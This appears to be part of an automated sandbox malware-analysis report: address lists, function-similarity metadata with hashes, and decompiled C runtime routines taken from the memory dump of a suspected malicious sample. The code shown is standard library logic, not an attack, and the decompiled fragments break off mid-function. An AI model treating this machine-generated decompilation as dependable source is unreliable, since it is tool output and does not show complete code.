    0x00b96287
    0x00b9628a
    0x00b9628d
    0x00b96290
    0x00b96297
    0x00b9629e
    0x00000000
    0x00000000
    0x00b962aa
    0x00b962aa
    0x00b962b1
    0x00b962bd
    0x00b962c0
    0x00b962c6
    0x00b962cd
    0x00000000
    0x00000000
    0x00b962cf
    0x00b962d5
    0x00b962d5
    0x00b962dc
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00b96320
    0x00b96320
    0x00b96327
    0x00b9632a
    0x00b96354
    0x00b96357
    0x00b96357
    0x00b96361
    0x00b96361
    0x00b96365
    0x00b9632c
    0x00b9632c
    0x00b96338
    0x00b9633b
    0x00b9633f
    0x00b96341
    0x00b96344
    0x00b96344
    0x00b96347
    0x00b9634a
    0x00b9634d
    0x00b9634f
    0x00b9634f
    0x00b96352
    0x00b96368
    0x00000000
    0x00000000
    0x00b9636d
    0x00b9636d
    0x00000000
    0x00000000
    0x00b96379
    0x00b96379
    0x00b96380
    0x00b96383
    0x00b963a3
    0x00b963a6
    0x00b963a6
    0x00b963b0
    0x00b963b0
    0x00b963b4
    0x00b96385
    0x00b96385
    0x00b96391
    0x00b96394
    0x00b96398
    0x00b9639a
    0x00b9639a
    0x00b963a1
    0x00000000
    0x00000000
    0x00b963bc
    0x00b963bc
    0x00b963c3
    0x00b963cf
    0x00b963d2
    0x00b963d8
    0x00b963df
    0x00b964f2
    0x00000000
    0x00b964f2
    0x00b963e5
    0x00b963eb
    0x00b963eb
    0x00b963f2
    0x00000000
    0x00b96429
    0x00b96429
    0x00b9642c
    0x00b9642f
    0x00b96432
    0x00b96459
    0x00b96459
    0x00b9645c
    0x00b9645f
    0x00b96462
    0x00b96486
    0x00b96486
    0x00b96489
    0x00b9648c
    0x00b9648f
    0x00b964c8
    0x00b964d9
    0x00000000
    0x00b964d9
    0x00b96491
    0x00b96491
    0x00b96494
    0x00b96497
    0x00b9649a
    0x00000000
    0x00000000
    0x00b9649c
    0x00b9649c
    0x00b9649f
    0x00b964a2
    0x00b964a5
    0x00000000
    0x00000000
    0x00b964a7
    0x00b964a7
    0x00b964aa
    0x00b964ad
    0x00b964b0
    0x00000000
    0x00000000
    0x00b964b2
    0x00b964b2
    0x00b964b5
    0x00b964b8
    0x00b964bb
    0x00000000
    0x00000000
    0x00b964bd
    0x00b964bd
    0x00b964c0
    0x00b964c3
    0x00b964c6
    0x00b964ca
    0x00000000
    0x00b964ca
    0x00000000
    0x00b964c6
    0x00b96464
    0x00b96464
    0x00b96467
    0x00b9646b
    0x00b9646e
    0x00000000
    0x00b96470
    0x00b96473
    0x00b96476
    0x00b9647c
    0x00b96481
    0x00000000
    0x00b96481
    0x00b9646e
    0x00b96434
    0x00b96434
    0x00b96437
    0x00b9643b
    0x00b9643e
    0x00000000
    0x00b96440
    0x00b96443
    0x00b96446
    0x00b9644c
    0x00b96451
    0x00000000
    0x00b96451
    0x00000000
    0x00b964db
    0x00b964db
    0x00b964de
    0x00b964e1
    0x00000000
    0x00000000
    0x00b963f9
    0x00b963f9
    0x00b963fc
    0x00b963ff
    0x00b96402
    0x00b9641b
    0x00b9641e
    0x00b9641e
    0x00b96421
    0x00b96404
    0x00b96404
    0x00b96407
    0x00b9640a
    0x00b96410
    0x00b96416
    0x00b96416
    0x00000000
    0x00000000
    0x00b964e6
    0x00b964e6
    0x00b964e9
    0x00b964e9
    0x00b964ef
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00b964f7
    0x00b964f7
    0x00b964fe
    0x00b96504
    0x00b9650a
    0x00b9650d
    0x00b96513
    0x00b9651a
    0x00000000
    0x00b96d70
    0x00b96d70
    0x00b96d70
    0x00b96d70
    0x00b96d74
    0x00000000
    0x00000000
    0x00000000
    0x00b96d74
    0x00b96d27
    0x00b96d2d
    0x00b96d30
    0x00b96d33
    0x00b96d36
    0x00b96d39
    0x00b96d3f
    0x00b96d3f
    0x00b96d3f
    0x00b96d47
    0x00b96d4b
    0x00000000
    0x00000000
    0x00b96d4d
    0x00b96d4d
    0x00b96d50
    0x00b96d53
    0x00b96d53
    0x00b96d58
    0x00b96d5b
    0x00b96d5e
    0x00b96d61
    0x00b96d64
    0x00b96d67
    0x00b96d6a
    0x00b96d6a
    0x00b96d6d
    0x00b96d70
    0x00b96d70
    0x00b96d74
    0x00000000
    0x00000000
    0x00000000
    0x00b96d74
    0x00b96d70
    0x00b96520
    0x00b96526
    0x00b96526
    0x00b9652d
    0x00000000
    0x00b968b1
    0x00b968b1
    0x00b968bf
    0x00b968bf
    0x00b968c2
    0x00000000
    0x00000000
    0x00b96534
    0x00b96537
    0x00b96537
    0x00b9653d
    0x00b9653f
    0x00b96542
    0x00b96542
    0x00b96545
    0x00b96545
    0x00000000
    0x00000000
    0x00b9667a
    0x00b9667d
    0x00b9667d
    0x00b96682
    0x00b96684
    0x00b96687
    0x00b96687
    0x00b9668a
    0x00b9668a
    0x00000000
    0x00000000
    0x00b96a7d
    0x00b96a7d
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00b968c9
    0x00b968cc
    0x00b968cf
    0x00b968d2
    0x00b968d8
    0x00b968db
    0x00b968e2
    0x00b968e6
    0x00b968f1
    0x00b968f1
    0x00b968f5
    0x00b9690c
    0x00b9690c
    0x00b96913
    0x00b96915
    0x00b96915
    0x00b9691c
    0x00b9691c
    0x00b96923
    0x00b96931
    0x00b96934
    0x00b96943
    0x00b96946
    0x00b9694a
    0x00b9695f
    0x00b9694c
    0x00b9694c
    0x00b9694f
    0x00b96955
    0x00b9695a
    0x00b9695a
    0x00b9694a
    0x00b96969
    0x00b9696c
    0x00b9696f
    0x00b96972
    0x00b96975
    0x00b96978
    0x00b9697e
    0x00b96984
    0x00b9698c
    0x00b9698d
    0x00b96990
    0x00b96991
    0x00b96994
    0x00b96995
    0x00b9699c
    0x00b9699d
    0x00b969a0
    0x00b969a1
    0x00b969a4
    0x00b969a5
    0x00b969ab
    0x00b969ac
    0x00b969bb
    0x00b969bd
    0x00b969c3
    0x00b969c3
    0x00b969c8
    0x00b969ca
    0x00b969ce
    0x00b969d0
    0x00b969d8
    0x00b969d9
    0x00b969dc
    0x00b969dd
    0x00b969ec
    0x00b969ee
    0x00b969ee
    0x00b969ce
    0x00b969f1
    0x00b969f8
    0x00b969fb
    0x00b96a00
    0x00b96a00
    0x00b96a06
    0x00b96a08
    0x00b96a10
    0x00b96a11
    0x00b96a14
    0x00b96a15
    0x00b96a23
    0x00b96a25
    0x00b96a25
    0x00b96a06
    0x00b96a28
    0x00b96a2b
    0x00b96a2e
    0x00b96a31
    0x00b96a36
    0x00b96a3b
    0x00b96a3e
    0x00b96a41
    0x00b96a41
    0x00b96a44
    0x00b96a44
    0x00b96a47
    0x00b96a53
    0x00000000
    0x00b96a53
    0x00b968f7
    0x00b968f7
    0x00b968fe
    0x00b96901
    0x00000000
    0x00000000
    0x00b96903
    0x00b96903
    0x00000000
    0x00b96903
    0x00b968e8
    0x00b968e8
    0x00000000
    0x00000000
    0x00b96548
    0x00b96548
    0x00b96553
    0x00b9655b
    0x00b96562
    0x00b96565
    0x00b96565
    0x00b96568
    0x00b965c8
    0x00b9656a
    0x00b96571
    0x00b96577
    0x00b9657d
    0x00b96584
    0x00b96587
    0x00b9658d
    0x00b96595
    0x00b96597
    0x00b9659e
    0x00b965a5
    0x00b965ac
    0x00b965b4
    0x00b965b6
    0x00b965b8
    0x00b965b8
    0x00b965bf
    0x00b965cf
    0x00b965d5
    0x00b965d8
    0x00b96d70
    0x00b96d70
    0x00b96d74
    0x00000000
    0x00000000
    0x00000000
    0x00b96d74
    0x00000000
    0x00000000
    0x00b96a5b
    0x00b96a5e
    0x00b96a61
    0x00b96a64
    0x00000000
    0x00000000
    0x00b967ba
    0x00b967ba
    0x00b967c6
    0x00b967cc
    0x00b967d1
    0x00b967d3
    0x00b9687d
    0x00b9687d
    0x00b96880
    0x00b96880
    0x00b96883
    0x00b96897
    0x00b9689d
    0x00b968a3
    0x00b96885
    0x00b96885
    0x00b9688b
    0x00b96892
    0x00b96892
    0x00b968a5
    0x00b96d70
    0x00b96d70
    0x00b96d74
    0x00000000
    0x00000000
    0x00000000
    0x00b96d74
    0x00b96d70
    0x00b967d9
    0x00b967d9
    0x00b967d9
    0x00b967db
    0x00b967e9
    0x00b967dd
    0x00b967dd
    0x00b967dd
    0x00b967f3
    0x00b967f9
    0x00b967ff
    0x00b96806
    0x00b96808
    0x00b9680d
    0x00b9680f
    0x00b96814
    0x00b96819
    0x00b9681b
    0x00b96820
    0x00b96823
    0x00b96826
    0x00b96828
    0x00b96828
    0x00b96826
    0x00b96829
    0x00b96830
    0x00b96878
    0x00b96d70
    0x00b96d70
    0x00b96d74
    0x00000000
    0x00000000
    0x00000000
    0x00b96d74
    0x00b96832
    0x00b96832
    0x00b96837
    0x00b96853
    0x00b9685b
    0x00b96865
    0x00b96868
    0x00b9686d
    0x00000000
    0x00b9686d
    0x00000000
    0x00b96ac4
    0x00b96ac4
    0x00b96ace
    0x00b96ace
    0x00b96ad4
    0x00b96ad6
    0x00b96ad9
    0x00b96ad9
    0x00b96adf
    0x00b96adf
    0x00000000
    0x00000000
    0x00b96a76
    0x00b96a76
    0x00000000
    0x00000000
    0x00b9668d
    0x00b9668d
    0x00b96691
    0x00b9669f
    0x00b966a2
    0x00b96693
    0x00b96693
    0x00b96693
    0x00b966a8
    0x00b966ae
    0x00b966b4
    0x00b966c0
    0x00b966c6
    0x00b966c6
    0x00b966c9
    0x00b96751
    0x00b96751
    0x00b96755
    0x00b96757
    0x00b9675d
    0x00b9675d
    0x00b96760
    0x00b96767
    0x00b9676a
    0x00b96770
    0x00b96770
    0x00b96770
    0x00b96776
    0x00b9677c
    0x00b9677f
    0x00b96785
    0x00b96787
    0x00000000
    0x00000000
    0x00b96789
    0x00b96789
    0x00b9678f
    0x00b96792
    0x00b96794
    0x00000000
    0x00000000
    0x00b96796
    0x00b9679c
    0x00b9679f
    0x00b9679f
    0x00b967a7
    0x00b967a7
    0x00b967ad
    0x00b967ad
    0x00b967b2
    0x00000000
    0x00b966cf
    0x00b966cf
    0x00b966cf
    0x00b966d3
    0x00b966d5
    0x00b966da
    0x00b966da
    0x00b966dd
    0x00b966e0
    0x00b966e6
    0x00b966f8
    0x00b966f8
    0x00b966f8
    0x00b966fb
    0x00b96701
    0x00000000
    0x00000000
    0x00b96703
    0x00b96703
    0x00b96709
    0x00b9670c
    0x00b9670e
    0x00000000
    0x00000000
    0x00b96710
    0x00b96710
    0x00b96719
    0x00b9671f
    0x00b96723
    0x00b9672b
    0x00b9672d
    0x00b9672f
    0x00b96735
    0x00b96735
    0x00b96738
    0x00b96738
    0x00b96744
    0x00b96747
    0x00b966ef
    0x00b966f2
    0x00b966f2
    0x00b966f5
    0x00b966f5
    0x00b9674f
    0x00b967b5
    0x00b96d70
    0x00b96d70
    0x00b96d74
    0x00000000
    0x00000000
    0x00000000
    0x00b96d74
    0x00b96d70
    0x00000000
    0x00b96a6d
    0x00b96a6d
    0x00000000
    0x00000000
    0x00b96a89
    0x00b96a89
    0x00b96a93
    0x00b96a93
    0x00b96a9d
    0x00b96a9d
    0x00b96aa3
    0x00b96aa5
    0x00b96aaa
    0x00b96ab4
    0x00b96ab4
    0x00b96ab7
    0x00b96abb
    0x00b96abb
    0x00b96ae2
    0x00b96ae5
    0x00b96ae5
    0x00b96aea
    0x00b96b0c
    0x00b96b0c
    0x00b96b12
    0x00b96b34
    0x00b96b34
    0x00b96b37
    0x00b96b7e
    0x00b96b7e
    0x00b96b81
    0x00b96b9e
    0x00b96ba2
    0x00b96baa
    0x00b96baa
    0x00b96bac
    0x00b96bb2
    0x00b96b83
    0x00b96b83
    0x00b96b87
    0x00b96b8f
    0x00b96b90
    0x00b96b96
    0x00b96b96
    0x00b96b39
    0x00b96b3c
    0x00b96b3c
    0x00b96b3f
    0x00b96b5d
    0x00b96b69
    0x00b96b6c
    0x00b96b6d
    0x00b96b73
    0x00b96b41
    0x00b96b41
    0x00b96b45
    0x00b96b4d
    0x00b96b4e
    0x00b96b4f
    0x00b96b55
    0x00b96b55
    0x00b96b79
    0x00b96b14
    0x00b96b14
    0x00b96b20
    0x00b96b26
    0x00b96b26
    0x00b96aec
    0x00b96aec
    0x00b96af8
    0x00b96afe
    0x00b96afe
    0x00b96bbb
    0x00b96bbb
    0x00b96bbe
    0x00b96c00
    0x00b96c00
    0x00b96c06
    0x00b96c0c
    0x00b96c12
    0x00000000
    0x00b96bc0
    0x00b96bc0
    0x00b96bc0
    0x00b96bc7
    0x00000000
    0x00000000
    0x00b96bc9
    0x00b96bc9
    0x00b96bd4
    0x00b96bda
    0x00b96bdc
    0x00b96be2
    0x00b96be5
    0x00b96be7
    0x00b96bed
    0x00b96bf6
    0x00b96bfb
    0x00b96c18
    0x00b96c1b
    0x00b96c1b
    0x00b96c20
    0x00b96c25
    0x00b96c25
    0x00b96c2b
    0x00b96c2d
    0x00b96c33
    0x00b96c39
    0x00b96c39
    0x00b96c42
    0x00b96c42
    0x00b96c2b
    0x00b96c48
    0x00b96c4c
    0x00b96c5a
    0x00b96c5d
    0x00b96c60
    0x00b96c67
    0x00b96c69
    0x00b96c69
    0x00b96c4e
    0x00b96c4e
    0x00b96c4e
    0x00b96c76
    0x00b96c76
    0x00b96c7c
    0x00b96c7e
    0x00b96c7e
    0x00b96c85
    0x00b96c8b
    0x00b96c8e
    0x00b96c8e
    0x00b96c8e
    0x00b96c94
    0x00b96c97
    0x00b96c9a
    0x00b96c9c
    0x00000000
    0x00000000
    0x00b96c9e
    0x00b96ca4
    0x00b96ca4
    0x00b96caa
    0x00000000
    0x00000000
    0x00b96cac
    0x00b96cac
    0x00b96caf
    0x00b96cb2
    0x00b96cb9
    0x00b96cc0
    0x00b96cc8
    0x00b96cce
    0x00b96cd1
    0x00b96cd4
    0x00b96cdb
    0x00b96ce7
    0x00b96ced
    0x00b96cf3
    0x00b96cfa
    0x00b96cfc
    0x00b96d02
    0x00b96d02
    0x00b96d08
    0x00b96d08
    0x00b96d0e
    0x00b96d17
    0x00b96d1c
    0x00b96d1f
    0x00b96c8e
    0x00b96c8e
    0x00b96c94
    0x00b96c97
    0x00b96c9a
    0x00b96c9c
    0x00000000
    0x00000000
    0x00000000
    0x00b96c9c
    0x00b96c8e
    0x00b96bcb
    0x00b96bcb
    0x00b96bd2
    0x00000000
    0x00000000
    0x00000000
    0x00b96bd2
    0x00000000
    0x00b96d70
    0x00b96d70
    0x00b96d74
    0x00000000
    0x00000000
    0x00000000
    0x00b96d74
    0x00000000
    0x00000000
    0x00b962f9
    0x00b962f9
    0x00b962fc
    0x00b962ff
    0x00000000
    0x00000000
    0x00b96304
    0x00b96307
    0x00b9630d
    0x00000000
    0x00000000
    0x00b962ee
    0x00b962f1
    0x00b962f4
    0x00000000
    0x00000000
    0x00b962e3
    0x00b962e6
    0x00b962e9
    0x00000000
    0x00000000
    0x00b96312
    0x00b96312
    0x00b96315
    0x00b96315
    0x00b96318
    0x00000000
    0x00000000
    0x00b9631b
    0x00000000
    0x00000000
    0x00b9618b
    0x00b9618b
    0x00b9618d
    0x00b9619b
    0x00b9618f
    0x00b9618f
    0x00b9618f
    0x00b961ab
    0x00b961b8
    0x00b961ba
    0x00b961bf
    0x00b961c1
    0x00b961c6
    0x00b961cb
    0x00b961cd
    0x00b961d2
    0x00b961d8
    0x00b961da
    0x00b961da
    0x00b961d8
    0x00b961db
    0x00b961e2
    0x00000000
    0x00b961e4
    0x00b961e9
    0x00b96205
    0x00b9620d
    0x00b9621a
    0x00b9621f
    0x00b97034
    0x00b97041
    0x00b97041
    0x00b961e2
    0x00b96185
    0x00b96f70
    0x00b96f77
    0x00b96f8e
    0x00b96f8e
    0x00b96f98
    0x00b96f98
    0x00b96f9e
    0x00b96fab
    0x00b96fad
    0x00b96fb2
    0x00b96fb4
    0x00b96fb9
    0x00b96fbe
    0x00b96fc0
    0x00b96fc5
    0x00b96fcb
    0x00b96fcd
    0x00b96fcd
    0x00b96fcb
    0x00b96fd5
    0x00b97020
    0x00b97029
    0x00b9702e
    0x00b96fd7
    0x00b96fdc
    0x00b96ff8
    0x00b97000
    0x00b9700d
    0x00b97012
    0x00b97012
    0x00000000
    0x00b96fd5
    0x00b96f79
    0x00b96f80
    0x00000000
    0x00000000
    0x00b96f82
    0x00b96f82
    0x00000000
    0x00b96f82
    0x00b96d70
    0x00b9660b
    0x00b9660b
    0x00b96611
    0x00b96618
    0x00b9661d
    0x00b96620
    0x00000000
    0x00b96620

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.638265274.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
    • Associated: 00000000.00000002.638237207.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.638841801.0000000000D11000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.638905915.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b70000_SecuriteInfo.jbxd
    Similarity
    • API ID: _write_multi_char$__mbtowc_l_get_int_arg_strlen_write_string
    • String ID: ("Incorrect format specifier", 0)$_woutput_s_l$f:\dd\vctools\crt_bld\self_x86\crt\src\output.c
    • API String ID: 909868375-2264504294
    • Opcode ID: 28e21e9471f4247e5f4fd21f5447fdf9e0cf180c4fd90b00ee9a050b90d97f4a
    • Instruction ID: 5b3b6731c67077713b82049f6d36e7c6ad2302c8c801bec61b6a3023ec6700df
    • Opcode Fuzzy Hash: 28e21e9471f4247e5f4fd21f5447fdf9e0cf180c4fd90b00ee9a050b90d97f4a
    • Instruction Fuzzy Hash: 7EA15AB1D002289BDF24DF54CD81BADB7F5EB48304F1481E9E619AB292D7349E84CF55
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • __set_error_mode.LIBCMTD ref: 00B86EB8
    • __set_error_mode.LIBCMTD ref: 00B86EC7
    • GetStdHandle.KERNEL32(000000F4), ref: 00B86EDE
    • _strlen.LIBCMT ref: 00B86F04
    • WriteFile.KERNEL32(000000FF,00000000,00000000,00000000), ref: 00B86F1C
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.638265274.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
    • Associated: 00000000.00000002.638237207.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.638841801.0000000000D11000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.638905915.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b70000_SecuriteInfo.jbxd
    Similarity
    • API ID: __set_error_mode$FileHandleWrite_strlen
    • String ID: jjj$t/j$#0
    • API String ID: 1121076223-2314305889
    • Opcode ID: abe182dc8b082c1b3132dbfd5efdf0ae8dac2d3ba853317cf9eeb558eb30f2e3
    • Instruction ID: 20eb8a819a8dcda827284ba38d62bfeda617294c3bc3e90aabdb13caa2eaf0fb
    • Opcode Fuzzy Hash: abe182dc8b082c1b3132dbfd5efdf0ae8dac2d3ba853317cf9eeb558eb30f2e3
    • Instruction Fuzzy Hash: 2721C278940209FBDF24EF48E985BACB3F5EB14301F248194E609A62B1D7319E50DF91
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    Strings
    • HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer.Memory allocated at %hs(%d)., xrefs: 00B7F4E0
    • %hs located at 0x%p is %Iu bytes long.Memory allocated at %hs(%d)., xrefs: 00B7F691
    • HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer.Memory allocated at %hs(%d)., xrefs: 00B7F57E
    • HEAP CORRUPTION DETECTED: on top of Free block at 0x%p.CRT detected that the application wrote to a heap buffer that was freed.Memory allocated at %hs(%d)., xrefs: 00B7F61C
    Memory Dump Source
    • Source File: 00000000.00000002.638265274.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
    • Associated: 00000000.00000002.638237207.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.638841801.0000000000D11000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.638905915.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b70000_SecuriteInfo.jbxd
    Similarity
    • API ID: BytesCheck
    • String ID: %hs located at 0x%p is %Iu bytes long.Memory allocated at %hs(%d).$HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer.Memory allocated at %hs(%d).$HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer.Memory allocated at %hs(%d).$HEAP CORRUPTION DETECTED: on top of Free block at 0x%p.CRT detected that the application wrote to a heap buffer that was freed.Memory allocated at %hs(%d).
    • API String ID: 1653226792-1867057952
    • Opcode ID: a6f82258ab7a76f5efb458ce53437b47ed8a4b0df60931e633b60b85bee1fc74
    • Instruction ID: ff702aef10accc76920b7929527006b063333fdef9037b434821482a4707152e
    • Opcode Fuzzy Hash: a6f82258ab7a76f5efb458ce53437b47ed8a4b0df60931e633b60b85bee1fc74
    • Instruction Fuzzy Hash: 04612FB5E002069FDB18CF88C895FBEB3F5EB58704F24C158E5296B391D274E842CB68
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 59%
    			E00B92DB4(signed int __eax) {
    				intOrPtr _t45;
    				void* _t50;
    				signed int _t54;
    				void* _t60;
    				signed int _t67;
    				signed int _t69;
    				signed int _t71;
    				signed int _t73;
    				signed int _t79;
    				void* _t80;
    				void* _t81;
    				void* _t82;
    				void* _t84;
    				void* _t85;
    				void* _t94;
    
    				_t85 = _t84 + 0x10;
    				 *(_t82 - 0xc) = __eax;
    				if( *(_t82 - 0xc) != 0xffffffff) {
    					_t71 =  *(_t82 - 0xc) + 1;
    					 *(_t82 - 0xc) = _t71;
    					__eflags =  *(_t82 + 0xc);
    					if( *(_t82 + 0xc) == 0) {
    						L27:
    						__eflags =  *(_t82 + 8);
    						if( *(_t82 + 8) != 0) {
    							 *( *(_t82 + 8)) =  *(_t82 - 0xc);
    						}
    						_t45 =  *((intOrPtr*)(_t82 - 4));
    						L30:
    						return _t45;
    					}
    					__eflags =  *(_t82 - 0xc) -  *(_t82 + 0x10);
    					if( *(_t82 - 0xc) <=  *(_t82 + 0x10)) {
    						L26:
    						_t73 =  *(_t82 + 0xc) +  *(_t82 - 0xc);
    						__eflags = _t73;
    						 *((char*)(_t73 - 1)) = 0;
    						goto L27;
    					}
    					__eflags =  *((intOrPtr*)(_t82 + 0x18)) - 0xffffffff;
    					if( *((intOrPtr*)(_t82 + 0x18)) == 0xffffffff) {
    						L25:
    						 *(_t82 - 0xc) =  *(_t82 + 0x10);
    						 *((intOrPtr*)(_t82 - 4)) = 0x50;
    						goto L26;
    					}
    					 *( *(_t82 + 0xc)) = 0;
    					__eflags =  *(_t82 + 0x10) - 0xffffffff;
    					if( *(_t82 + 0x10) != 0xffffffff) {
    						__eflags =  *(_t82 + 0x10) - 0x7fffffff;
    						if( *(_t82 + 0x10) != 0x7fffffff) {
    							__eflags =  *(_t82 + 0x10) - 1;
    							if( *(_t82 + 0x10) > 1) {
    								__eflags =  *0xd11328 -  *(_t82 + 0x10) - 1; // 0xffffffff
    								if(__eflags >= 0) {
    									_t67 =  *(_t82 + 0x10) - 1;
    									__eflags = _t67;
    									 *(_t82 - 0x2c) = _t67;
    								} else {
    									_t54 =  *0xd11328; // 0xffffffff
    									 *(_t82 - 0x2c) = _t54;
    								}
    								_t71 =  *(_t82 - 0x2c);
    								_t52 =  *(_t82 + 0xc) + 1;
    								__eflags =  *(_t82 + 0xc) + 1;
    								E00B81BB0(_t80, _t52, 0xfe, _t71);
    								_t85 = _t85 + 0xc;
    							}
    						}
    					}
    					_t65 =  *(_t82 + 0x10);
    					__eflags =  *(_t82 - 0xc) -  *(_t82 + 0x10);
    					asm("sbb edx, edx");
    					 *(_t82 - 0x18) =  ~_t71;
    					if( *(_t82 - 0xc) ==  *(_t82 + 0x10)) {
    						_push(L"sizeInBytes > retsize");
    						_push(0);
    						_push(0x157);
    						_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\wcstombs.c");
    						_push(2);
    						_t50 = L00B7D760();
    						_t85 = _t85 + 0x14;
    						__eflags = _t50 - 1;
    						if(_t50 == 1) {
    							asm("int3");
    						}
    					}
    					__eflags =  *(_t82 - 0x18);
    					if( *(_t82 - 0x18) != 0) {
    						goto L25;
    					} else {
    						 *((intOrPtr*)(L00B80C60(_t65))) = 0x22;
    						E00B809F0(_t60, _t65, _t80, _t81, L"sizeInBytes > retsize", L"_wcstombs_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\wcstombs.c", 0x157, 0);
    						_t45 = 0x22;
    						goto L30;
    					}
    				}
    				if( *(_t82 + 0xc) != 0) {
    					 *( *(_t82 + 0xc)) = 0;
    					if( *(_t82 + 0x10) != 0xffffffff &&  *(_t82 + 0x10) != 0x7fffffff &&  *(_t82 + 0x10) > 1) {
    						_t94 =  *0xd11328 -  *(_t82 + 0x10) - 1; // 0xffffffff
    						if(_t94 >= 0) {
    							_t79 =  *(_t82 + 0x10) - 1;
    							__eflags = _t79;
    							 *(_t82 - 0x28) = _t79;
    						} else {
    							_t69 =  *0xd11328; // 0xffffffff
    							 *(_t82 - 0x28) = _t69;
    						}
    						_t61 =  *(_t82 + 0xc) + 1;
    						E00B81BB0(_t80,  *(_t82 + 0xc) + 1, 0xfe,  *(_t82 - 0x28));
    					}
    				}
    				_t45 =  *((intOrPtr*)(L00B80C60(_t61)));
    				goto L30;
    			}


















    0x00b92db4
    0x00b92db7
    0x00b92dbe
    0x00b92e2a
    0x00b92e2d
    0x00b92e30
    0x00b92e34
    0x00b92f21
    0x00b92f21
    0x00b92f25
    0x00b92f2d
    0x00b92f2d
    0x00b92f2f
    0x00b92f32
    0x00b92f35
    0x00b92f35
    0x00b92e3d
    0x00b92e40
    0x00b92f17
    0x00b92f1a
    0x00b92f1a
    0x00b92f1d
    0x00000000
    0x00b92f1d
    0x00b92e46
    0x00b92e4a
    0x00b92f0a
    0x00b92f0d
    0x00b92f10
    0x00000000
    0x00b92f10
    0x00b92e53
    0x00b92e56
    0x00b92e5a
    0x00b92e5c
    0x00b92e63
    0x00b92e65
    0x00b92e69
    0x00b92e71
    0x00b92e77
    0x00b92e86
    0x00b92e86
    0x00b92e89
    0x00b92e79
    0x00b92e79
    0x00b92e7e
    0x00b92e7e
    0x00b92e8c
    0x00b92e98
    0x00b92e98
    0x00b92e9c
    0x00b92ea1
    0x00b92ea1
    0x00b92e69
    0x00b92e63
    0x00b92ea4
    0x00b92ea7
    0x00b92eaa
    0x00b92eae
    0x00b92eb1
    0x00b92eb3
    0x00b92eb8
    0x00b92eba
    0x00b92ebf
    0x00b92ec4
    0x00b92ec6
    0x00b92ecb
    0x00b92ece
    0x00b92ed1
    0x00b92ed3
    0x00b92ed3
    0x00b92ed1
    0x00b92ed4
    0x00b92ed8
    0x00000000
    0x00b92eda
    0x00b92edf
    0x00b92efb
    0x00b92f03
    0x00000000
    0x00b92f03
    0x00b92ed8
    0x00b92dc4
    0x00b92dc9
    0x00b92dd0
    0x00b92de7
    0x00b92ded
    0x00b92dfd
    0x00b92dfd
    0x00b92e00
    0x00b92def
    0x00b92def
    0x00b92df5
    0x00b92df5
    0x00b92e0f
    0x00b92e13
    0x00b92e18
    0x00b92dd0
    0x00b92e20
    0x00000000

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.638265274.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
    • Associated: 00000000.00000002.638237207.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.638841801.0000000000D11000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.638905915.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b70000_SecuriteInfo.jbxd
    Similarity
    • API ID: _memset$__invalid_parameter
    • String ID: P$_wcstombs_s_l$f:\dd\vctools\crt_bld\self_x86\crt\src\wcstombs.c$sizeInBytes > retsize
    • API String ID: 2178901135-56445615
    • Opcode ID: a6a6951f210e07f67de44c960a4ca58cee9d82da13f867fe0a0695829cfede42
    • Instruction ID: 49a3fbb3079899c1d8fc8ceefa0696536454ed9df184e651e21f14c475d82610
    • Opcode Fuzzy Hash: a6a6951f210e07f67de44c960a4ca58cee9d82da13f867fe0a0695829cfede42
    • Instruction Fuzzy Hash: 2C414630D00209EBCF28DF68C8857AE77F0EB45325F20C6A9F8396A291D7709995CB94
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 90%
    			E00B7FEC7() {
    				intOrPtr _t54;
    				void* _t61;
    				intOrPtr _t68;
    				void* _t70;
    				void* _t98;
    				void* _t99;
    				signed int _t100;
    				void* _t102;
    				void* _t105;
    
    				L0:
    				while(1) {
    					L0:
    					 *(_t100 - 4) =  *(_t100 - 4) + 1;
